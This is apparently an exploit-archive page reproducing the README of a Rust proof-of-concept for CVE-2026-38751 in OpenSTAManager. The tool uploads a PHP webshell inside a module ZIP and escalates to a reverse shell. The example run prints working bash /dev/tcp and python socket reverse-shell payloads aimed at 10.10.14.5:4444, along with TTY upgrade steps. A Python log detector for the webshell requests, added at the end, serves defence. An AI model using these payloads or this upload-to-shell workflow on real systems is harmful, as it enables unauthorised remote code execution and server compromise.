## https://sploitus.com/exploit?id=52E3EC4D-B3B2-5A5A-B602-597C9814297E
# OpenSTAManager RCE Exploit (CVE-2026-38751)
**Arbitrary File Upload leading to Remote Code Execution**
Full-featured proof-of-concept for **CVE-2026-38751**, written in **Rust**.
> **Warning**: This tool is intended for **authorised security testing and educational purposes only**. Use it only on systems you own or have explicit permission to test.
---
## Description
OpenSTAManager ≤ 2.10 is vulnerable to an **authenticated arbitrary file upload** that allows an attacker to upload a malicious ZIP archive containing a PHP webshell. This PoC automates the process:
- Log in with valid credentials
- Upload a malicious module with a webshell
- Verify the vulnerability
- **Interactive web shell** (command execution)
- **Reverse shell** with TTY handling (multiple payloads)
- Cleanup of the uploaded backdoor
---
## Features
| Feature | Description |
|---------|-------------|
| **Login** | Authenticates using provided credentials. |
| **ZIP generation** | Creates a ZIP file with a valid `MODULE` descriptor and a PHP shell. |
| **File upload** | Sends the malicious ZIP via the update mechanism. |
| **Verification** | Checks if the shell is reachable and executes a test command (`id`). |
| **Interactive web shell** | Lets you run commands interactively through the webshell (`-i`). |
| **Reverse shell** | Sends multiple payloads (bash, python, base64, nc, mkfifo) to get a shell. |
| **TTY upgrade instructions** | Shows a step-by-step guide to getting a fully interactive TTY. |
| **Cleanup** | Removes the uploaded `shell.php` automatically (unless `--no-cleanup`). |
---
## 🛠️ Requirements
- [Rust](https://www.rust-lang.org/tools/install) (1.70+)
- A **target** running OpenSTAManager ≤ 2.10.
- A **valid user account** (with password) to log in.
---
## Installation
Clone the repository and build the binary:
```bash
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help
```
## Example
```text
$ ./openstamanager-rce-exploit --url http://target.com/ -U -P --lhost 10.10.14.5 --lport 4444
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'
[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows columns
[*] (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.
bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
```
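The run above leaves a recognisable trace in the web server's access log: direct requests to a PHP file inside a module directory, carrying the shell's `c` parameter. The following is an added detection example, not part of the original PoC. It assumes Combined Log Format access logs; the path shape and parameter name are the PoC defaults shown in the output, while the function name, the `known_modules` allowlist, the `example_module` name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# PHP file requested directly inside a module directory,
# e.g. /modules/shell/shell.php as printed by the PoC.
MODULE_PHP_RE = re.compile(r'/modules/(?P<module>[^/]+)/(?P<file>[^/]+\.php)$', re.I)
CMD_PARAM = "c"  # parameter name used by the PoC's shell (from the run above)

def find_webshell_hits(lines, known_modules=frozenset()):
    """Return one dict per request that hits a PHP file in a module directory
    outside the allowlist and passes the PoC's command parameter."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        pm = MODULE_PHP_RE.search(url.path)
        if not pm or pm["module"] in known_modules:
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if CMD_PARAM not in params:
            continue
        hits.append({
            "ip": m["ip"], "time": m["time"], "status": int(m["status"]),
            "path": url.path, "command": params[CMD_PARAM][0],
        })
    return hits

# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2026:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
    '10.10.14.5 - - [01/Jan/2026:10:00:09 +0000] "GET /modules/shell/shell.php?c=id HTTP/1.1" 200 54 "-" "-"',
    '10.10.14.5 - - [01/Jan/2026:10:00:12 +0000] "GET /modules/shell/shell.php?c=whoami HTTP/1.1" 200 9 "-" "-"',
    '192.0.2.7 - - [01/Jan/2026:10:01:00 +0000] "GET /modules/example_module/report.php?c=2 HTTP/1.1" 200 812 "-" "-"',
]

if __name__ == "__main__":
    # example_module is a hypothetical, legitimately installed module name.
    for hit in find_webshell_hits(SAMPLE_LOG, known_modules={"example_module"}):
        print(hit)
```

The file and parameter names are only the PoC's defaults, so treat a match as a lead for reviewing recently created directories under `modules/`, not as a complete signature.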